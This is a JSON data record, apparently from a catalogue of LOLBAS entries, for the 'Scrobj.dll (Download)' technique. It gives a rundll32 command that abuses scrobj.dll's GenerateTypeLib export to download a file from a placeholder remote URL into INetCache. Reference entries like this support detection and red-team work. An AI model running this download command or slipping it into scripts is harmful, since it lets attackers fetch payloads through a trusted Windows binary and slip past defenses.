{
  "id": "lolbas-scrobj-dll-download",
  "name": "LOLBAS · Scrobj.dll (Download)",
  "command": "rundll32.exe C:\\Windows\\System32\\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}",
  "description": "Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.",
  "platform": "windows",
  "tags": [
    "lolbas",
    "scrobj.dll",
    "download"
  ],
  "source": "lolbas",
  "source_url": "https://lolbas-project.github.io/lolbas/Scrobj.dll/",
  "upstream_id": "Scrobj.dll/Download/0",
  "category": "lolbas",
  "subcategory": "download",
  "references": [
    {
      "title": "LOLBAS — Scrobj.dll",
      "url": "https://lolbas-project.github.io/lolbas/Scrobj.dll/"
    }
  ]
}
